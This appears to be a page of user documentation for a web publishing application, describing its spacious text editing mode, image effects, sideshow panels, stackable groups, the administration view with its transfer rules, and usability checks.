Java EE 6, JAXB, JPA, EclipseLink, Eclipse, Oxygen XML, Visual Paradigm for UML, Dojo, jQuery, HTML5, CSS 2.1, MySQL, OrientDB, XML, JavaScript, NoSQL, JNDI, Tomcat 7, CloudBees, Amazon AWS, Jasmine, DOH Robot, UML, Microsoft Project, JIRA, Mylyn, Git, PureTest, CodePro Analytix, PMD, JUnit, Photoshop, Fireworks, SHA1, PayPal API, Chrome extension, Firefox Add-on, Mockingbird, Adobe AIR, MySQL Workbench, Jenkins, continuous integration, REST, async servlets + filters, refactoring, design patterns, naming conventions

Text flowing from text area to another

The "spacious" text editing attempts to emulate pages placed side by side and underneath each other by using resizable text areas, where text is automatically run through as many other text areas as necessary as the text is typed or after text areas are resized. It is possible to move from one text area to another by using the arrow keys on the keyboard. If images or other attachments are attached to the writing, they will remain unchanged, even if they are not displayed in this mode to indicate that they are attached to the writing.

Spacious mode has a restriction, at least for now, that the font must be a monospaced (fixed width), and there can be no formatting or included images in the writing (they will get removed). Also, the text cannot be copied with the mouse in such a way as to copy the contents of more than one text areas at a time. At the bottom of the first text area there is a resize button that allows adjusting the size of all text areas, e.g. to have two wide and tall text areas next to each other, three oblong text areas next to each other or small text areas in a grid pattern. Excess text areas are automatically deleted or, if more are needed to accommodate the text, they are added. Adjusting the size of the browser window gives more control over how many text areas can be placed side by side. Those that cannot fit on one row will start a new row of text areas.

In spacious mode, it is possible to move text paragraphs forwards or backwards by placing the cursor over a text paragraph and pressing up or down arrow key together with the Ctrl key. The moving text paragraph will then swap places with the adjacent one. This functionality strengthens the feeling that the text is continuous as the text paragraph moves between text areas as well as in the same text area.

Image effects in combination or separately

The image selections made in the "image assorting" view can be used in some other views, which in the "image effects processing" view means using preselected images as original images to which image effects are applied, where each effect or combination of effects generate a new image which can be saved as a new image to the same image container by Ctrl-clicking on it.

There are a few different external services made available for generating image effects, some of which offer a set of combinable effects, others allow the use of mathematics to generate image effects, and some specialise in some form of image transformation such as upscaling an image to a larger size using AI. These services require registering a user account, which in many case allow generating an apikey, which need to be put in the user settings of the publishing application. None of the choosen external services are meant to take so-called text prompts as an input to generating images based on that.

Visualizing writing finding groups

There is also a view for the "visualisation" of how writing findability group's descriptions target all of users writings, wherein writing's relations to descriptions are presented using symbols, wherein symbols are either mean that a writing doesn't have or it has one or more of such. The challenge for usability is that the user's mind gets overwhelmed with wondering which symbol is related to which writing finding groups' description and where to keep the descriptions while the user browses through the listed writings, even though they are sorted and separated by project and writing collections. It is indeed possible that looking at these symbols may make them seem "empty" in their meaning. However, the descriptions of one writing finding groups can be taken in use by Ctrl-clicking on it.

Sideshows and functional embeds

Writing collections, writings and special pages are not the only things one can encounter on the front page of a solution. A feature called Sideshow allows placing a kind of information panel on the side of the front page, which can display results of queries from different databases, lists of writing by some criteria, news from other sites, advertisements, interactive features, etc.

Picture 1. Commands to fetch latest news from two different API-service.

Picture 2. Sideshow on a frontpage of a work that uses content list type "Out of ink".

Picture 3. Sideshow on a frontpage of a work that uses content list type "Plain structure".

To automatically enhance the content of writings, various types of functional embeds may be used. They appear alongside writing when editing the such, just like other placeholders. They can be used to add list of subheading from the writing, a list of contributors, a live news section with subheadings, etc., without much effort. It is not guaranteed that these features are available before they can be considered to not be experimental features.

Stackable solutions in the list of published works

When there are e.g. several parts to a published publication series and a user has plenty of other published works, it may be clearer to let a stacked presentation indicate that there several solutions more for a reader to select. In practice, this is done by adding a "#" character (without a space) after the group name in solutions' settings, followed by a number. Then, on the Profile tab of the user preferences, in the "Stackable groups" text field, the information specifying the stack is added, following the syntax "group name#snippet number#snippet name#snippet title". The last two are optional, but the group name and stack number must be included. If there is more than one stack, they are separated by a semicolon.

Clicking on a stack in a solution index will show the solutions in that stack, arranged similarly, without changing the web address.

If you later decide that you don't want to use certain stack, it is not necessary to edit group names in the settings of each solution as it is sufficient to remove the defined stack in the user settings. Any additions to the group names, such as "#1", will then simply remain unused.

One of the things that makes this experimental is that many browsers do not apply the antialiasing effect to images that have been rotated, which then looks rather coarse, especially the images containing text [correction: CSS styling with "transform-style: preserve-3d;" fixes the problem].

Management, administrating

This view that needs a separate login account is not intended to be used very often. Usually, only at the very beginning of becoming publishing application customer, this view need to be accessed briefly so that CDN address can be set. Without it being set all the public pages' footer contain a message that mentions about missing CDN address.

It provides, among other things, the possibility to create new users and the editing of user-specific constraints. Some areas of the managing view contain just information e.g. "how much outbound transfer bandwidth has been used in the current billing cycle".

If a project meant to be transferred to another user has adequate sets attached with it, these associations will be removed. However, adequateate sets can be transferred from one user to another separately.

The regularities for user-to-user transfers are:

a project can be transferred from one user to another if the project catalogs are only used by that project, otherwise the transfer attempt is aborted from the start
a catalogue can be transferred from one user to another if the catalogue is not used by any project
a solution can be transferred from one project to another if they are from the same user
an adequate set can be transferred from one user to another, but the adequate set is detached from all projects

These transfers typically require a relevant id code (e.g. projectid) and the username of the user to whom something is meant to be transferred. The text fields for these are helpful in that after entering an id or username and clicking outside text fields, additional information about e.g. target user is retrieved for display.

Occasionally, on rare occasions, one might choose from the normal user accounts the one that will become the main user, i.e. the one whose public solkutions will be listed when going to the domain's index page. Otherwise, a user listing would be displayed, from which one could select to see the user-specific listing of published solutions.

If necessary (highly unlikely), there's a simple button that can be used to clear the contents of long-lived caches that form in the central memories of the servers in use. Such caches include a partial copy of the database contents with relations, as it is much faster to retrieve information from them than from the database, as the database is located on a slower SSD.

It is possible to choose to reduce the visible size of the listed public solutions, when viewed on a smallish browser window widths so that more of them can be displayed at once, or to place them underneath each other and to not hide the descriptive text os solutions.

Usability checks

This user-specific view is very prototypical and not just in its naming. It is intended to

a) Be used to let oneself to become aware about possible problems (Problems) that may occur, e.g. when transferring elements in a slightly incomplete way, e.g. from project to project, but forgetting to transfer something. Where possible, "one-click" fixes are available.

b) To confirm something that needs a little more clarification (Clarifications), such as the lengths (in terms of time) of solutions' caches and images that are in some image catalogs but aren't used anywhere. There is also a somewhat similar option in the "browse image catalogs" view, which filters image lists to show only those images that are not yet used anywhere. When one have a lot of pictures, things like that can get forgotten.

c) Let one get manually reminded (Reminders) about something that might need to be / should be checked periodically like e.g. to list writings that are marked as "preparing". It is possible that this functionality could end up somewhere else with a different implementation.

It was meant to make this screen be useful without need for a user to do too much clicking and thus have all the relevant information loaded at once. This may also mean that something is better utilized elsewhere. E.g. it is convenient to optionally list writings with a readyness status of "preparing" in the "project listing" view.

<-- KWS - Instructions and additional information